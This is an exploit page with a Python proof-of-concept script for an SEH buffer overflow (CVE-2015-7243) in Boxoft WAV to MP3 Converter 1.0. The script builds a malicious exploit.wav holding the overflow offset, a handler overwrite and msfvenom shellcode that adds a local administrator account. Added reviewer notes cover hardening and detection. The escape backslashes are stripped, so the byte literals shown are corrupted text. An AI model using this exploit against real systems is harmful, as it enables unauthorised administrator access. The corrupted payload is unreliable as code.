Boxoft Wav To MP3 Converter 1.0 Buffer Overflow
Posted on 01 June 2016
# Exploit Title: Boxoft WAV to MP3 Converter - SEH Based Buffer Overflow Exploit
# Date: 31/5/2016
# Exploit Author: Mandar
# Vendor Homepage: http://www.boxoft.com/wav-to-mp3/
# Software Link: http://www.boxoft.com/wav-to-mp3/setup(free-wav-to-mp3).exe
# Version: Boxoft WAV to MP3 Converter v1.0
# Tested on: Windows XP SP3, Windows 7 SP1 (64 bit), Windows 8.1, Windows 10 (64 bit)
# CVE : CVE-2015-7243
# Reference : https://www.exploit-db.com/exploits/38035/
# Category: Local Exploit
#
# Steps to reproduce (as given by the author):
# - Run the Boxoft WAV to MP3 Converter and select batch convert mode and hit next
# - Add exploit.wav file (generated by the PoC) and hit the convert to mp3 option
# - User "Hack" (pass-Hack@123) will be added to the local administrative group.
#
# Reviewer notes (defensive context):
# - Bug class: the converter parses an attacker-supplied .wav file and, per the
#   author's comments, an oversized input reaches the thread's SEH record at
#   offset 4132. Nothing on this page mentions a vendor fix.
# - The handler address the author chose lies inside the application's own
#   executable, which suggests (not verified here) that the module was built
#   without SafeSEH/ASLR. System-wide SEHOP and forced ASLR/DEP through Windows
#   exploit-protection settings are the relevant hardening controls.
# - Detection: the recorded payload is msfvenom's windows/adduser, so a
#   successful run shows up as a new local account and an Administrators
#   group change (Windows Security events 4720 and 4732). A media converter
#   spawning a command interpreter is a second signal worth alerting on.
# - As captured on this page, the escape sequences have lost their
#   backslashes, so the literals below are plain ASCII text rather than raw
#   bytes. They are reproduced unchanged.

#!/usr/bin/python
import sys
import struct

# Name of the generated test file that is fed to the converter's batch mode.
out_path = "exploit.wav"

# Filler up to the Next-SEH field (offset per the author), and trailing filler
# that pads the file out past the overwritten record.
junk = "x41" * 4132       # offset to Next SEH
endofbuff = "x42" * 5300  # junk

# Overwritten exception-registration record: next-record field, then handler.
nseh = "xebx06x90x90"  # hop over SEH
# pop ecx pop ebp ret
# (C:\Program Files (x86)\Boxoft Wav to MP3 (freeware)\wavtomp3.exe)
seh = "xd3x24x40x00"

# Payload provenance as recorded by the author:
#msfvenom -a x86 --platform windows -p windows/adduser USER=hack PASS=Hack@123 -e x86/shikata_ga_nai -b "x00" EXITFUNC=process -f python
buf = (
    ""
    "xdbxc0xd9x74x24xf4x5fx29xc9xb1x43xb8x27"
    "x27x79xeex31x47x19x03x47x19x83xc7x04xc5"
    "xd2x85x06x8bx1dx76xd7xebx94x93xe6x2bxc2"
    "xd0x59x9bx80xb5x55x50xc4x2dxedx14xc1x42"
    "x46x92x37x6cx57x8ex04xefxdbxccx58xcfxe2"
    "x1fxadx0ex22x7dx5cx42xfbx0axf3x73x88x46"
    "xc8xf8xc2x47x48x1cx92x66x79xb3xa8x31x59"
    "x35x7cx4axd0x2dx61x76xaaxc6x51x0dx2dx0f"
    "xa8xeex82x6ex04x1dxdaxb7xa3xfdxa9xc1xd7"
    "x80xa9x15xa5x5ex3fx8ex0dx15xe7x6axafxfa"
    "x7exf8xa3xb7xf5xa6xa7x46xd9xdcxdcxc3xdc"
    "x32x55x97xfax96x3dx4cx62x8ex9bx23x9bxd0"
    "x43x9cx39x9ax6exc9x33xc1xe4x0cxc1x7fx4a"
    "x0exd9x7fxfbx66xe8xf4x94xf1xf5xdexd0x0d"
    "xbcx43x70x85x19x16xc0xc8x99xccx07xf4x19"
    "xe5xf7x03x01x8cxf2x48x85x7cx8fxc1x60x83"
    "x3cxe2xa0xe0xafx78x65x82x57xe5x59x63xcb"
    "xc5xf7x1ex7fx25x7dx92x1ax57x5dx3cx84xf4"
    "xf6x9cx0ex9bx6bxb6xcex6ax5ex7bxefxa3xdf"
    "x3fxabx9bxf9x99x13xb5x60x92x73x25x04x39"
    "x15xd9xbdxcfxbax54x32x10x04xf2xdfx39xe8"
    "x93x6cxcex86x02xe7x41x15xb7x27xf6xb8x54"
    "x43x26x14xdbxd7x62x6a"
)

# Short pad placed between the overwritten record and the payload.
nop = "x90" * 10

# Field order is fixed by the record layout: filler, next-record field,
# handler, pad, payload, trailing filler.
payload = "".join([junk, nseh, seh, nop, buf, endofbuff])

# Text mode "w", as in the original script. The context manager closes the
# handle even if the write fails.
with open(out_path, "w") as handle:
    handle.write(payload)